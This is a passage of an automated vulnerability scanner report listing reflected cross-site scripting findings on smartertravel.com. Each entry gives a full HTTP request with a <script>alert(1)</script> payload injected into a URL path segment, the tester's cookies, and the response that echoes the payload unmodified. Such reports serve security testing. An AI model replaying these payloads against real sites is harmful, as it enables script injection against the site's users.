HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 23:55:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:55:53 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:55:53 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 23:55:53 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/compare-prices2ce18<script>alert(1)</script>4b77517ffa3/car-rental/</p>
...[SNIP]...

2.22. http://www.smartertravel.com/compare-prices/car-rental/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /compare-prices/car-rental/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4984e<script>alert(1)</script>7b8ae6a8ccf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /compare-prices/car-rental4984e<script>alert(1)</script>7b8ae6a8ccf/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 23:56:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:56:34 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:56:34 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 23:56:34 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/compare-prices/car-rental4984e<script>alert(1)</script>7b8ae6a8ccf/</p>
...[SNIP]...

2.23. http://www.smartertravel.com/compare-prices/cruise/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /compare-prices/cruise/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7b475<script>alert(1)</script>ce9bf9ad05d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /compare-prices7b475<script>alert(1)</script>ce9bf9ad05d/cruise/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 23:58:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:58:31 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:58:31 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 23:58:31 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/compare-prices7b475<script>alert(1)</script>ce9bf9ad05d/cruise/</p>
...[SNIP]...

2.24. http://www.smartertravel.com/compare-prices/cruise/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /compare-prices/cruise/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9d902<script>alert(1)</script>896c48a306c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /compare-prices/cruise9d902<script>alert(1)</script>896c48a306c/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 23:58:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:00:29 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:00:29 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 00:00:29 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/compare-prices/cruise9d902<script>alert(1)</script>896c48a306c/</p>
...[SNIP]...

2.25. http://www.smartertravel.com/compare-prices/flights/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /compare-prices/flights/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 92e92<script>alert(1)</script>35db0fb48dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /compare-prices92e92<script>alert(1)</script>35db0fb48dd/flights/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 23:54:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:54:46 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:54:46 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 23:54:46 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/compare-prices92e92<script>alert(1)</script>35db0fb48dd/flights/</p>
...[SNIP]...

2.26. http://www.smartertravel.com/compare-prices/flights/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /compare-prices/flights/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6d46f<script>alert(1)</script>312cf48ea52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /compare-prices/flights6d46f<script>alert(1)</script>312cf48ea52/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 23:56:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:56:09 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:56:09 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 23:56:09 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/compare-prices/flights6d46f<script>alert(1)</script>312cf48ea52/</p>
...[SNIP]...

2.27. http://www.smartertravel.com/compare-prices/hotel/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /compare-prices/hotel/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload da2a8<script>alert(1)</script>ccce20328ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /compare-pricesda2a8<script>alert(1)</script>ccce20328ec/hotel/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 00:02:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:02:29 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:02:29 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 00:02:29 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/compare-pricesda2a8<script>alert(1)</script>ccce20328ec/hotel/</p>
...[SNIP]...

2.28. http://www.smartertravel.com/compare-prices/hotel/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /compare-prices/hotel/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 50bea<script>alert(1)</script>2fdf9cb6dc5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /compare-prices/hotel50bea<script>alert(1)</script>2fdf9cb6dc5/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 00:02:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:04:16 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:04:16 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 00:04:16 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/compare-prices/hotel50bea<script>alert(1)</script>2fdf9cb6dc5/</p>
...[SNIP]...

2.29. http://www.smartertravel.com/compare-prices/vacation-package/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /compare-prices/vacation-package/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a645c<script>alert(1)</script>a8c87fa7372 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /compare-pricesa645c<script>alert(1)</script>a8c87fa7372/vacation-package/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 21:58:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:58:00 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:58:00 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:58:00 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/compare-pricesa645c<script>alert(1)</script>a8c87fa7372/vacation-package/</p>
...[SNIP]...

2.30. http://www.smartertravel.com/compare-prices/vacation-package/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /compare-prices/vacation-package/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8a8aa<script>alert(1)</script>2f1f8d351a6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /compare-prices/vacation-package8a8aa<script>alert(1)</script>2f1f8d351a6/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 21:58:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:58:41 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:58:41 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:58:41 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27566

